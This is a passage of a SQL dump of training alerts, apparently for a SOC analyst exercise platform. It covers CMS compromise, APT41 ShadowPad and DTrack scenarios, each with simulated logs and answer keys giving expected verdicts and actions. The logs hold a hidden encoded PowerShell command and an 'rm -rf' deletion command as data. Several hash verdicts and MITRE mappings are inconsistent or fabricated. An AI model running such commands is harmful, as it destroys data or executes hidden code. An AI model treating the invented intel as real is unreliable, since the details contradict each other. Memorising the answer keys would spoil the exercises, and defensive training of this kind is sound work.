exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(481, 'Suspicious Login Detected', 'medium', 'CMS Security Logs', 'An unauthorized login attempt was detected on the news website\'s CMS. The user\'s credentials were likely harvested through a phishing email. The attempt was made from a known malicious IP address.', 'Initial Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-07T14:23:56Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.5\",\"username\":\"j.smith@newswebsite.com\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\",\"login_status\":\"failed\",\"reason\":\"invalid_credentials\",\"related_email\":\"phishing_campaign@maliciousdomain.com\",\"malicious_url\":\"http://maliciousdomain.com/login\",\"hash\":\"3c3f4d4e2b5c6d7e8f9a1b2c3d4e5f6a\"}', '2026-01-05 03:22:52', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"j.smith@newswebsite.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Registered CMS user.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Source Intelligence\",\"verdict\":\"malicious\",\"details\":\"URL used in phishing campaigns to harvest credentials.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"phishing_campaign@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email address used for phishing campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3c3f4d4e2b5c6d7e8f9a1b2c3d4e5f6a\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential-stealing malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(482, 'Unauthorized CMS Article Publication', 'high', 'Website Change Log', 'An unauthorized publication of articles detected on the CMS. Attackers utilized stolen credentials to disseminate false narratives aiming to influence public opinion through misinformation.', 'Execution', 'T1203 - Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T13:45:30Z\",\"event_id\":\"cms-2023-unauth-pub-002\",\"user\":\"compromised_editor\",\"ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.10.25\",\"modified_files\":[\"/var/www/cms/articles/fake-news-001.html\",\"/var/www/cms/articles/fake-news-002.html\"],\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action_taken\":\"Published\",\"timestamp_publish\":\"2023-10-15T13:44:55Z\"}', '2026-01-05 03:22:52', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous misinformation campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_editor\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Access Logs\",\"verdict\":\"internal\",\"details\":\"Username with elevated permissions used in unauthorized actions.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Empty file or common default hash, requires further investigation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(483, 'Backdoor Account Creation', 'high', 'User Account Activity Report', 'An attacker has created a new user account with administrative privileges on the CMS to maintain persistent access.', 'Persistence', 'T1136: Create Account', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_type\":\"user_account_creation\",\"user\":\"adminuser1\",\"created_by\":\"attacker_account\",\"created_at\":\"2023-10-05T14:20:00Z\",\"ip_address\":\"192.168.1.25\",\"external_ip\":\"203.0.113.5\",\"new_account\":{\"username\":\"backdooradmin\",\"privileges\":\"administrator\",\"creation_method\":\"web_interface\"},\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"cms_user_mgmt.php\"}', '2026-01-05 03:22:52', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"backdooradmin\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Newly created account with admin privileges.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"clean\",\"details\":\"Common hash associated with empty files.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"cms_user_mgmt.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File related to user management in CMS.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(484, 'Social Media Amplification Detected', 'medium', 'Social Media Monitoring Tools', 'A bot network was detected disseminating fake articles across various social media platforms, amplifying false narratives.', 'Lateral Movement', 'T1090 - Connection Proxy', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:30Z\",\"event_id\":\"SMAT-4567\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.15\",\"username\":\"social_bot_user\",\"filename\":\"amplification_script.py\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"url\":\"http://examplemalicioussite.com/fake-news\",\"action\":\"post\",\"platform\":\"SocialMediaNet\",\"article_title\":\"Breaking News: Major Event Unfolds\",\"article_id\":\"art-7890\"}', '2026-01-05 03:22:52', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Associated with known botnet activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Recognized internal host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"social_bot_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Unusual behavior detected.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"amplification_script.py\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Script used for spreading misinformation.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known malware.\"}},{\"id\":\"artifact_6\",\"type\":\"url\",\"value\":\"http://examplemalicioussite.com/fake-news\",\"is_critical\":true,\"osint_result\":{\"source\":\"Web Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Site used for hosting fake news.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(485, 'Data Exfiltration Attempt Detected', 'high', 'Network Traffic Analysis', 'Finally, the attackers attempted to exfiltrate sensitive data from the CMS, aiming to use it for further operations or to sell on the dark web.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T19:45:00Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.55\",\"protocol\":\"HTTPS\",\"port\":443,\"filename\":\"sensitive_cms_data.zip\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"action\":\"exfiltration_attempt\",\"alert_id\":\"EXFIL-2023-001\",\"malicious_url\":\"https://malicious.example.com/upload\",\"detected_by\":\"IDS\",\"description\":\"A data exfiltration attempt was detected by analyzing outgoing traffic from internal IP 192.168.1.105 to external IP 203.0.113.55 using HTTPS protocol.\"}', '2026-01-05 03:22:52', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network_check\",\"verdict\":\"internal\",\"details\":\"Internal company network IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_service\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"suspicious\",\"details\":\"File hash matches known suspicious file signature.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"sensitive_cms_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"File name indicates potential sensitive data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(486, 'Initial Access via Compromised Supplier Network', 'high', 'Third-party network traffic logs', 'APT41 successfully exploited vulnerabilities in the supplier\'s network to gain initial access to the video game developer\'s environment, leveraging compromised credentials and known malware.', 'Supply Chain Compromise', 'T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:47:23Z\",\"event_id\":\"123456789\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"supplier_admin\",\"malware_filename\":\"ccleaner_setup.exe\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"login_success\",\"protocol\":\"https\",\"url\":\"https://supplier-compromised.com/update\",\"message\":\"Successful login from external IP using compromised credentials. Known malicious file transferred.\"}', '2026-01-05 03:26:48', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT41 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of video game developer\'s server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"supplier_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"Compromised credentials used for unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with CCleaner Supply Chain attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES
(487, 'Execution of Malicious Code in Build Environment', 'critical', 'Build server activity logs', 'APT41 executed a code injection attack by embedding a ShadowPad backdoor into the game executable during the build process, leveraging access to the build environment.', 'Code Injection', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:35:12Z\",\"build_server\":\"build-server-01\",\"user\":\"jdoe\",\"internal_ip\":\"192.168.50.24\",\"external_ip\":\"203.0.113.45\",\"malicious_file\":\"game_exec_v2.exe\",\"malicious_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"injected_payload\":\"ShadowPad.dll\",\"event_description\":\"Detected execution of a code injection attack involving the ShadowPad backdoor.\"}', '2026-01-05 03:26:48', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.50.24\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the build server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Associated with previous APT41 attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malicious hash associated with ShadowPad backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ShadowPad.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious payload used by APT41.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(488, 'Establishing Persistence with ShadowPad', 'high', 'Endpoint detection and response (EDR) logs', 'APT41 has installed the ShadowPad backdoor on a compromised system running a vulnerable gaming application. This action establishes a covert channel for persistent access, typical of APT41\'s tactics in targeting the gaming industry.', 'Backdoor Installation', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"123456789\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.1.25\",\"user\":\"john.doe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -nop -w hidden -encodedcommand W3N0YXJ0IC1wYXJhbSB7ZXhwbG9pdC5leGUgfQ==\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"ShadowPad.dll\",\"severity\":\"high\",\"description\":\"ShadowPad backdoor installation detected via PowerShell execution on host 10.1.1.25 by user john.doe.\"}', '2026-01-05 03:26:48', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT41 external IP used in ShadowPad campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local network host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ShadowPad malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ShadowPad.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"File linked to ShadowPad backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(489, 'Lateral Movement Across Player Networks', 'high', 'User authentication logs', 'APT41 has been detected using the ShadowPad backdoor to perform credential dumping for lateral movement across player networks.', 'Credential Dumping', 'T1003.006 - OS Credential Dumping: DCSync', 1, 'new', NULL, '{\"timestamp\":\"2023-10-23T13:45:00Z\",\"event_type\":\"authentication_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.101\",\"username\":\"gamer123\",\"auth_method\":\"NTLM\",\"hashed_password\":\"e99a18c428cb38d5f260853678922e03\",\"malware_filename\":\"shadowpad.dll\",\"process_id\":4567,\"event_description\":\"Credential dumping attempt detected from external IP using NTLM authentication method.\",\"related_hash\":\"f3c6c09f0c3e3c4b1ee2f6f9c5e8f9df\",\"related_ip\":\"10.0.0.15\"}', '2026-01-05 03:26:48', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT41 activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP within player network.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"gamer123\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with potential credential dumping tools.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"shadowpad.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Filename linked with ShadowPad backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(490, 'Data Exfiltration and Command Execution', 'critical', 'Network traffic analysis', 'APT41 has successfully exfiltrated sensitive data from the network and executed remote commands using an established backdoor. This action aligns with their known TTPs, causing significant damage to the compromised systems.', 'Data Theft', 'T1041 - Exfiltration Over Command and Control Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:45:00Z\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"203.0.113.45\",\"src_port\":8080,\"dst_port\":443,\"protocol\":\"TCP\",\"username\":\"jdoe\",\"file_exfil\":{\"filename\":\"confidential_data.zip\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\"},\"command_executed\":\"rm -rf /sensitive_data/*\",\"malware_name\":\"Backdoor.APT41\",\"external_command_control\":\"203.0.113.45\"}', '2026-01-05 03:26:48', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known APT41 command and control server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with exfiltrated data.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file exfiltrated by attacker.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Compromised user account used for exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(491, 'Suspicious Email Attachment Detected', 'high', 'Email Gateway Logs', 'A spear-phishing email was detected targeting a key personnel in a South Korean defense firm. The email contains a malicious attachment disguised as a procurement request.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-03T08:45:23Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.10.5.23\",\"destination_email\":\"j.smith@defensecorp.kr\",\"attachment_name\":\"Procurement_Request_2023.docx\",\"attachment_hash\":\"e2fc714c4727ee9395f324cd2e7f331f\",\"subject\":\"Urgent: Procurement Request\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\"}', '2026-01-05 04:01:18', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns targeting defense sectors.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.10.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted user.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"j.smith@defensecorp.kr\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Email address of a key personnel at the targeted company.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Procurement_Request_2023.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"File contains active macro that downloads additional payloads.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e2fc714c4727ee9395f324cd2e7f331f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used in spear-phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(492, 'Execution of DTrack Payload', 'high', 'Endpoint Detection and Response (EDR)', 'Upon opening the malicious attachment, a macro executes, downloading the DTrack payload onto the victim\'s machine, marking the next phase of the attack.', 'Execution', 'T1204: User Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4624\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.1.15\",\"file_created\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\DTrackPayload.exe\",\"file_hash\":\"d4e5f6a7b8c9d0e1f2g3h4i5j6k7l8m9\",\"process_name\":\"macro_loader.exe\",\"process_command_line\":\"macro_loader.exe -d C:\\\\Users\\\\jdoe\\\\Documents\\\\malicious.docm\",\"process_id\":\"6789\",\"parent_process\":\"WINWORD.EXE\",\"parent_process_id\":\"1234\"}', '2026-01-05 04:01:18', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known command and control server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d4e5f6a7b8c9d0e1f2g3h4i5j6k7l8m9\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"DTrack malware sample\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"DTrackPayload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection and Response\",\"verdict\":\"suspicious\",\"details\":\"Unusual execution detected\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Valid user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(493, 'Establishing Persistence with DLL Hijacking', 'high', 'System Logs', 'The attackers utilize DLL hijacking techniques to embed DTrack into legitimate processes, allowing them to maintain a foothold within the network.', 'Persistence', 'T1574.001 - DLL Search Order Hijacking', 1, 'new', NULL, '{\"event_id\":4624,\"timestamp\":\"2023-10-15T14:32:00Z\",\"computer_name\":\"compromised-host.local\",\"user_name\":\"compromised_user\",\"source_ip\":\"203.0.113.5\",\"destination_ip\":\"10.0.0.12\",\"process_name\":\"C:\\\\Program Files\\\\LegitApp\\\\LegitApp.exe\",\"injected_dll\":\"C:\\\\Windows\\\\System32\\\\hijacked.dll\",\"malware_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"event_description\":\"DLL hijacking detected in LegitApp.exe with injected DLL hijacked.dll\"}', '2026-01-05 04:01:18', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised 